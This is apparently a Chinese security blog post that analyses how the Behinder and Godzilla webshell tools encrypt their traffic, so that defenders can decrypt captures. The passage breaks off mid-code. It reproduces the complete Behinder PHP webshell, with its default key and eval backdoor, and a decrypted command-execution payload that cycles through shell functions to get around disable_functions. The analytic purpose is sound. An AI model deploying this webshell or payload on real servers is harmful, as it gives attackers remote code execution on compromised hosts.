流量加密怎么办？主流webshell管理工具流量解密分析【附解密脚本】

最新推荐文章于 2025-10-16 17:11:47 发布

原创

最新推荐文章于 2025-10-16 17:11:47 发布 · 2.5k 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#php #开发语言 #网络安全 #经验分享

本文深入分析了冰蝎和哥斯拉的加解密机制，包括PHP、ASP、C#、Java等不同平台的加密方式，并提供了简易解密脚本。冰蝎主要使用AES和异或，而哥斯拉则提供多种加密选项，如AES、XOR等，解密时需考虑首尾填充位。解密脚本可用于行动中帮助解密通信数据。

一、引言

某行动在即，本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla，对它们的加解密方式进行识别和分析【附简易解密脚本】，希望能在行动中助大家一臂之力。

二、冰蝎

冰蝎加密机制，通过阅读代码可知分为四类，即jsp，php，aspx，asp。

2.1 PHP

阅读php木马脚本：


<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
  $_SESSION['k']=$key;
  session_write_close();
  $post=file_get_contents("php://input");
  if(!extension_loaded('openssl'))
  {
    $t="base64_"."decode";
    $post=$t($post."");
    
    for($i=0;$i<strlen($post);$i++) {
           $post[$i] = $post[$i]^$key[$i+1&15]; 
          }
            echo "no openssl";
  }
  else
  {
    $post=openssl_decrypt($post, "AES128", $key);
  }
  // echo $post;
  // echo "------------------";
    $arr=explode('|',$post);
    // echo $arr[1];
    // echo "------------------";
    $func=$arr[0];
    $params=$arr[1];
  class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

阅读代码可知，在有openssl的情况下冰蝎会使用openssl进行aes128解密，在没有的情况下使用异或解密。

以一次cmd执行为例进行分析为例：

抓取请求进行AES128解密,得到如下代码，与冰蝎源码中的php payload互相对应：


@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd,$path)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result